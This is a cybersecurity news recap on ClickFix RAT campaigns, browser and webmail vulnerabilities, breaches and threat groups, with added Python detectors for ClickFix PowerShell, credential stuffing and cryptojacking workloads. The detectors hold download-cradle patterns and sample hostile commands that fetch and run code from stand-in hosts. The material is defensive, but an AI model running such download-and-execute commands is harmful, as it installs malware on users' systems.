Cybersecurity Daily Recap highlights recent threats involving PowerShell-based campaigns delivering NetSupport RAT and AsyncRAT through social engineering tactics. It also covers critical vulnerabilities patched in Chrome, Roundcube, and Fire Panels, alongside a notable data breach at Cartier and ongoing activities of groups like Scattered Spider and Lazarus. #NetSupportRAT #AsyncRAT #ChromeZeroDay #CartierDataBreach #ScatteredSpider #LazarusGroup
Malware & RAT Campaigns
- A multi-stage PowerShell attack spreading NetSupport RAT uses fake DocuSign and Gitcode sites for delivery; because the victim runs the pasted command themselves, no exploit is needed and the chain slips past many detections – NetSupport RAT Spread
- Victims are redirected to fake Booking.com pages hosting CAPTCHA prompts that copy a PowerShell command to the clipboard and instruct the user to paste and run it (the so-called ClickFix technique), leading to infection with Backdoor.AsyncRAT – AsyncRAT Infection
- The Crocodilus Android Trojan, now active in 8 countries, uses fake contacts to spoof trusted callers and targets banks and crypto wallets with credential and seed phrase theft – Crocodilus Trojan, Crocodilus Fake Contacts
- The Acreed infostealer rises as a dominant threat after the Lumma takedown, focusing on credential theft from SaaS and SSO platforms across industries – Acreed Infostealer
- Attackers weaponize the free SSH client PuTTY on Windows to establish stealthy backdoors using trusted binaries and registry manipulation – PuTTY Malware
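The NetSupport RAT and AsyncRAT items above both rely on the victim pasting a clipboard payload into the Run dialog, so the telemetry signature is a script host spawned by explorer.exe with a hidden window and a download cradle. The following is an added detection example written for this recap, not code from any of the reports linked above; the process-creation records are constructed and use a simplified subset of Sysmon Event ID 1 fields (parent, image, cmdline), and the scoring weights are this example's own choice.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added example: flags a script host (powershell/pwsh/mshta/cmd) spawned by
explorer.exe with command-line features typical of a pasted clipboard payload.
Encoded commands (-enc) are decoded (UTF-16LE base64) and scanned as well.
"""
import base64
import re

# Win+R / Run-dialog launches appear as children of explorer.exe
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
ALERT_THRESHOLD = 3  # example's own choice: three or more reasons raise an alert

# Features typical of a ClickFix clipboard payload
CRADLE_PATTERNS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hid", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
        r"|downloadstring|downloadfile|curl|wget)\b", re.I),
    "execution policy bypass": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "remote url": re.compile(r"https?://", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if _basename(event["image"]) not in SCRIPT_HOSTS:
        return 0, reasons
    parent = _basename(event["parent"])
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("script host spawned by " + parent)
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        # an encoded command counts twice: once for being encoded, once for its content
        reasons.append("decoded -enc payload: " + decoded)
        text = text + " " + decoded
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(text):
            reasons.append(name)
    return len(reasons), reasons


def find_clickfix(events):
    """Return [(index, reasons)] for events at or above ALERT_THRESHOLD."""
    hits = []
    for i, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= ALERT_THRESHOLD:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry); example.invalid is a reserved TLD.
_ENC_PAYLOAD = base64.b64encode(
    "iex (iwr 'http://example.invalid/x')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "iex (irm https://example.invalid/captcha)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + _ENC_PAYLOAD},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for index, reasons in find_clickfix(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"][:60], reasons)
```

The last sample event (an interactive `-NoProfile Get-Date` from explorer.exe) scores below the threshold on purpose: parent alone is not enough, and the weighting keeps an analyst's attention on the hidden-window, download-cradle and encoded-command combinations that the fake-CAPTCHA pages actually produce.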
Vulnerabilities & Patch Releases
- A critical 10-year-old Roundcube webmail bug (CVE-2025-49113) allows authenticated users to execute arbitrary code, patched in versions 1.6.11 and 1.5.10 LTS – Roundcube Bug
- Google patches a critical, actively exploited Chrome zero-day (CVE-2025-5419), an out-of-bounds read and write in the V8 JavaScript engine, in Chrome 137 – Chrome Zero-Day, Chrome Zero-Day Analysis, Chrome Emergency Patch
- Google's June 2025 Android security update fixes over 30 high-severity vulnerabilities, including zero-days in Qualcomm Snapdragon and Adreno GPU drivers that were exploited before fixes were available – Android Vulnerabilities, Qualcomm Zero-Days
- Two critical vulnerabilities in Consilium CS5000 Fire Panels allow remote system takeover via default accounts and embedded VNC credentials – CS5000 Fire Panel Flaws
- Preinstalled Android apps on Ulefone and Krüger&Matz phones have three critical flaws that enable device resets, PIN theft, and system-level privilege abuse – Phone App Flaws
- CISA warns of active exploitation of a ConnectWise ScreenConnect remote code execution vulnerability, alongside flaws in ASUS routers and Craft CMS, adding all three to its Known Exploited Vulnerabilities catalog – ScreenConnect Exploits
- Google Chrome will distrust certificates from Chunghwa Telecom and Netlock starting August 1, 2025, due to compliance and trust issues affecting TLS security – Chrome Distrust Certificates, Chrome Certificate Removal
Data Breaches & Cyberattacks
- MainStreet Bancshares suffered a data breach via a third-party vendor, exposing payment card data of about 4.65% of customers, though core systems remain secure – MainStreet Bank Breach, MainStreet Vendor Incident
- Cartier disclosed a data breach exposing customer names, emails, and countries but no financial information, amid ongoing cyber threats to luxury brands – Cartier Breach, Cartier Cyberattack
- The North Face reveals its fourth credential stuffing attack since 2020, exposing customer data including names and addresses; the absence of MFA on customer accounts let reused passwords translate directly into account takeovers – North Face Attack
- Next Step Healthcare experienced a ransomware-related data breach leaking thousands of patient SSNs, medical records, and credit cards, claimed by Qilin gang – Next Step Healthcare Breach
- A large phishing campaign targeting French users exploits leaked personal data to scam over 160,000 victims with fake Amazon Prime renewal messages – Phishing in France
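The North Face item above is a textbook credential stuffing case: one source replays leaked username/password pairs across many accounts, and without MFA every hit is an account takeover. The following is an added detection example for this recap, not code from The North Face or any vendor; the authentication log lines are constructed in an assumed `ts ip= user= result=` format, and the window and thresholds are this example's own choices.

```python
"""Detect credential stuffing from authentication logs.

Added example. The signal is many *distinct* usernames, mostly failing, from a
single source in a short window (a single user fumbling their own password
produces many failures but one username). Once a source is flagged, any
success from it is an account-takeover candidate: exactly the logins an MFA
prompt would have stopped.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # example's own choice
MIN_DISTINCT_USERS = 5          # distinct usernames from one source in the window
MIN_FAIL_RATIO = 0.8            # fraction of attempts in the window that failed


def parse_line(line):
    """Parse 'ISO-8601 ip=... user=... result=...' into (ts, ip, user, result)."""
    ts_str, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    ts = datetime.fromisoformat(ts_str.replace("Z", "+00:00"))
    return ts, fields["ip"], fields["user"], fields["result"]


def detect_credential_stuffing(lines, window=WINDOW, min_users=MIN_DISTINCT_USERS,
                               min_fail_ratio=MIN_FAIL_RATIO):
    """Return {'stuffing_sources': set(ip), 'takeover_candidates': set(user)}."""
    events = sorted(parse_line(l) for l in lines if l.strip())
    recent = defaultdict(deque)   # per-source sliding window of (ts, user, result)
    flagged, takeover = set(), set()
    for ts, ip, user, result in events:
        q = recent[ip]
        q.append((ts, user, result))
        while q and ts - q[0][0] > window:
            q.popleft()
        if ip in flagged:
            if result == "success":
                takeover.add(user)
            continue
        users = {u for _, u, _ in q}
        fails = sum(1 for _, _, r in q if r == "fail")
        if len(users) >= min_users and fails / len(q) >= min_fail_ratio:
            flagged.add(ip)
            # successes already inside the window were stuffing hits too
            takeover.update(u for _, u, r in q if r == "success")
    return {"stuffing_sources": flagged, "takeover_candidates": takeover}


# Constructed sample log (documentation-range IPs, not real data):
# 203.0.113.5 sprays eight accounts in seconds and gets one hit on 'dana';
# 198.51.100.7 is a real user retrying their own password.
SAMPLE_LOG = """\
2025-06-03T10:00:00Z ip=198.51.100.7 user=bob result=fail
2025-06-03T10:00:05Z ip=203.0.113.5 user=alice result=fail
2025-06-03T10:00:06Z ip=203.0.113.5 user=bob result=fail
2025-06-03T10:00:07Z ip=203.0.113.5 user=carol result=fail
2025-06-03T10:00:08Z ip=203.0.113.5 user=dana result=success
2025-06-03T10:00:09Z ip=203.0.113.5 user=erin result=fail
2025-06-03T10:00:10Z ip=203.0.113.5 user=frank result=fail
2025-06-03T10:00:11Z ip=203.0.113.5 user=grace result=fail
2025-06-03T10:00:12Z ip=203.0.113.5 user=heidi result=fail
2025-06-03T10:00:20Z ip=198.51.100.7 user=bob result=fail
2025-06-03T10:00:40Z ip=198.51.100.7 user=bob result=success
2025-06-03T10:01:00Z ip=198.51.100.9 user=erin result=success
"""

if __name__ == "__main__":
    print(detect_credential_stuffing(SAMPLE_LOG.splitlines()))
```

Keying on distinct usernames per source rather than raw failure counts is what separates stuffing from a forgetful user; in production the same logic should also be run per ASN or per device fingerprint, since stuffing tools rotate through proxy pools to stay under any single-IP threshold.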
Threat Group Activity & Cybercrime
- Scattered Spider threat group targets UK retailers using complex identity-based techniques including help desk scams and MFA bypasses via social engineering – Scattered Spider Overview, Scattered Spider Help Desk Scams
- North Korean Lazarus Group increasingly targets the cryptocurrency sector and Web3 projects; BitMEX's security team gained access to parts of the group's infrastructure, revealing uneven operational security and skill levels across its operators – Lazarus vs BitMEX
- International law enforcement operations disrupted crypting sites that test malware against antivirus tools, impacting ransomware gangs such as Ryuk – Crypting Sites Takedown
- A cryptojacking campaign exploits exposed DevOps APIs including Docker, Gitea, and HashiCorp Nomad to mine Monero using publicly available tools and GitHub-based payloads – Cryptojacking Campaign, Monero Mining via DevOps
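Exposed Docker, Gitea and Nomad APIs let the cryptojacking campaign above schedule its own workloads, so the first response question is which existing containers and jobs are already running a miner. The following is an added example written for this recap, not code from the campaign report or from HashiCorp or Docker; it walks any JSON-like workload description and scores string fields against miner indicators. The sample Nomad job and Docker container documents are constructed, their field names are modelled on `nomad job inspect` and `docker inspect` output as an assumption, and the indicator weights are this example's own choice.

```python
"""Scan workload specs (Nomad jobs, Docker containers) for crypto-miner indicators.

Added example. Walks every string in a JSON-like document so it works on any
schema, then scores distinct indicator types so a long argument list cannot
inflate the result. XMRig's binary name, stratum+tcp pool scheme and
--donate-level flag are public conventions of that tool; the weights are ours.
"""
import re

INDICATORS = [
    ("miner binary name", re.compile(r"\b(?:xmrig|minerd|cpuminer|nanominer|t-rex)\b", re.I), 3),
    ("stratum pool url", re.compile(r"stratum\+(?:tcp|ssl)://", re.I), 3),
    ("xmrig donate flag", re.compile(r"--donate-level", re.I), 2),
    ("shell download-and-run", re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash|tar)\b", re.I), 2),
    ("github release download", re.compile(r"github\.com/[^/\s]+/[^/\s]+/releases/download/", re.I), 1),
]
ALERT_THRESHOLD = 3   # example's own choice


def iter_strings(node, path="$"):
    """Yield (json_path, string) for every string leaf in a dict/list tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def scan_workload(spec):
    """Return [(path, indicator_name, weight)] for every matching string field."""
    findings = []
    for path, text in iter_strings(spec):
        for name, pattern, weight in INDICATORS:
            if pattern.search(text):
                findings.append((path, name, weight))
    return findings


def miner_score(spec):
    """Sum weights, counting each indicator type once per workload."""
    seen = {name: weight for _, name, weight in scan_workload(spec)}
    return sum(seen.values())


def is_cryptojacked(spec):
    return miner_score(spec) >= ALERT_THRESHOLD


# Constructed samples. Hostnames use the reserved .invalid TLD and the GitHub
# organisation/repository names are placeholders, not real projects.
NOMAD_JOB = {"Job": {"ID": "cleanup", "TaskGroups": [{"Name": "g", "Tasks": [{
    "Name": "run", "Driver": "raw_exec",
    "Config": {"command": "local/xmrig",
               "args": ["-o", "stratum+tcp://pool.example.invalid:3333", "--donate-level", "1"]},
    "Artifacts": [{"GetterSource":
                   "https://github.com/example-org/miner/releases/download/v1/xmrig-linux.tar.gz"}],
}]}]}}

DOCKER_BENIGN = {"Id": "abc", "Config": {"Image": "nginx:1.27",
                                          "Cmd": ["nginx", "-g", "daemon off;"]}}

# No miner name at all: the loader pattern plus a GitHub release pull still reach the threshold.
DOCKER_SUSPICIOUS = {"Id": "def", "Config": {"Image": "alpine", "Cmd": [
    "sh", "-c",
    "wget -qO- https://github.com/example-org/miner/releases/download/v1/m.tar.gz | tar xz"
    " && ./run -o pool.example.invalid:4444"]}}

if __name__ == "__main__":
    for label, spec in [("nomad job", NOMAD_JOB), ("nginx", DOCKER_BENIGN),
                        ("alpine loader", DOCKER_SUSPICIOUS)]:
        print(label, miner_score(spec), is_cryptojacked(spec))
        for path, name, _ in scan_workload(spec):
            print("   ", path, "->", name)
```

Feed it the JSON from `nomad job inspect <id>` or `docker inspect <container>` for each workload on a host whose API was reachable without authentication; the returned paths point straight at the offending `command`, `args` or artifact field. The low weight on GitHub release downloads is deliberate, since legitimate jobs pull from there too, which is why the Docker loader example only alerts in combination with the pipe-to-shell pattern.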
Industry & Cybersecurity Collaborations
- Microsoft and CrowdStrike have partnered to map and unify threat actor names like APT41 and APT28, improving clarity and collaboration in global cybersecurity intelligence – Threat Actor Mapping, Shared Threat Glossary, Microsoft-CrowdStrike Partnership
- Australia enforces new ransomware payment reporting regulations to enhance threat intelligence and cybersecurity defenses for affected businesses – Australia Ransomware Reporting
- Mozilla introduces an automated system to detect and block malicious Firefox crypto wallet add-ons, preventing wallet-draining attacks and safeguarding users – Mozilla Crypto Add-on Defense
- Microsoft tests a Quick Machine Recovery feature for Windows 11 aimed at enabling faster system repair and remote fixes, enhancing troubleshooting for users – Windows 11 Recovery
Legal & Business Updates
- The NSO Group appeals a $168 million damages award related to its Pegasus spyware, arguing the amount is excessive and designed to bankrupt the firm – NSO Pegasus Appeal
- SentinelOne’s recent seven-hour global outage was caused by a software flaw in their infrastructure control system, not a cyberattack, with endpoint security unaffected – SentinelOne Outage
Cybersecurity News | Daily Recap – hendryadrian.com